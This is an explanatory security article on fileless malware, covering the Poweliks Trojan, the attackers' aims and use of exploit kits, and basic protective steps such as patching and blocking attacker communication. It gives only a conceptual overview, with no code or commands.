Fileless malware infections appeared in August 2014, when the Poweliks Trojan made its debut. It was initially engineered to perform click-fraud, but it evolved to do much more.
WHAT ARE FILELESS INFECTIONS?
Fileless infections are exactly what they seem to be: malware or virus infections that don’t use any files in the process.
To understand their name, all we need is a very quick recap of how traditional antivirus products work:
The infection places files on the hard drive
The antivirus analyzes the malicious files (aka the payload)
If identified, the antivirus quarantines and/or removes the malicious files, keeping your computer safe.
These infections were called fileless because no files are dropped onto the system.
The consequences? You guessed them:
- Traditional antivirus products can’t identify this infection.
- Without additional protection, attackers can cause all sorts of damage.
We’re going to explain exactly what type of damage fileless infections can cause and how you can protect yourself from then. Let’s start with:
WHY CYBER CRIMINALS USE FILELESS MALWARE
Cyber criminals are resourceful and creative and this fileless infections are proof.
In their attacks, malicious hackers aim for:
Stealth – the ability to avoid being detected by security products for as long as possible
Privilege escalation – the capacity to exploit a vulnerability that will give them administrator access to the system, so they can do whatever they want
Information gathering – to harvest as much data about the victim and from the victim’s computer as possible (to be later used in other attacks);
Persistence – the ability to keep the malware in system, undetected, for longest time possible.
What malware creators have done with fileless infections is trade persistence for stealth. Keeping the malware infection concealed while it triggers the intended actions is key here.
When the exploit kit carrying the fileless infection finds its way into the system (explanation coming soon), the malware can fulfill its purpose directly. This is definitely not your typical malware!
Cyber criminals can also program fileless malware to gain persistence after it was written directly to RAM. That’s because it can hide in locations that are difficult to scan or detect by traditional antivirus products.
This new type of infection brought new prospects for malware makers. They now could:
- create new malware that could infect systems without triggering traditional detection mechanism;
- profit from wildly successful fileless malware infections by spreading new malware;
- run one-time info-stealing malware to gather information about an infected PC before infecting it with additional malware;
- move the payload, after the exploitation, to the Windows registry to achieve persistence;
- employ sophisticated, flexible and even modular exploit kits to find and manipulate vulnerabilities faster;
- use the high number of Zero- Day vulnerabilities to compromise a huge number of computers;
- make fast and easy money by infecting machines with ransomware.
How fileless malware infections work
In order to avoid detection by traditional antivirus products, attackers chose not to install a malware program on a disk drive, which could be detected through signature scanning. While traditional antivirus solutions can detect malicious payloads if they’re dropped on the disk or perhaps ran in memory (rarely), but only after the exploitation has happened.
EXPLOIT KITS – A MUST-HAVE FOR FILELESS INFECTIONS
In any successful fileless malware infection, exploit kits play an important part. Exploit kits are software programs designed to find flaws, weaknesses or mistakes in apps and use them to gain access into your computer or any other system.
Two core factors are driving the rise in fileless malware infections:
The fact that exploits kits-as-a-service has become a reality and cyber criminals of all kinds are trying their hand at using them;
The fact that malware makers are producing as many as 230,000 new malware samples per day offers attackers an endless array of attack vectors.
Because fileless malware is ran in your computer’s RAM memory, it can only work while you keep your PC on. This means that attackers have a smaller windows of opportunity to execute the attack and infiltrate your operating system. It’s true that we keep our computers on for much longer times than we used to, so cyber criminals will have more time to make the infection stick.
How to protect your computer against fileless infections
- When it first surfaced, fileless malware caused computers to run very very slowly, because it used their RAM memory to carry on the attack. As you’d imagine, that made them very easy to spot.
- But cyber criminals rapidly enhanced their tactics and code to make the fileless infection go unnoticed.
- The best way to protect yourself from fileless malware infections is to stop them before they happen.
- Apply security updates for your applications and operating system.
- blocking the pages hosting the exploit kit.
- blocking the payload delivery.
- blocking the communication between your PC and the attackers’ servers
- The next layer of protection insured by a proactive security product is to block the communication between your computer and the servers controlled by cyber criminals.
By doing this, the attackers won’t be able to retrieve the data collected from your PC, so data exfiltration attempts will be futile. Moreover, cyber criminals won’t be able to infect your system with additional malware.
Source: Heimdalacademy, google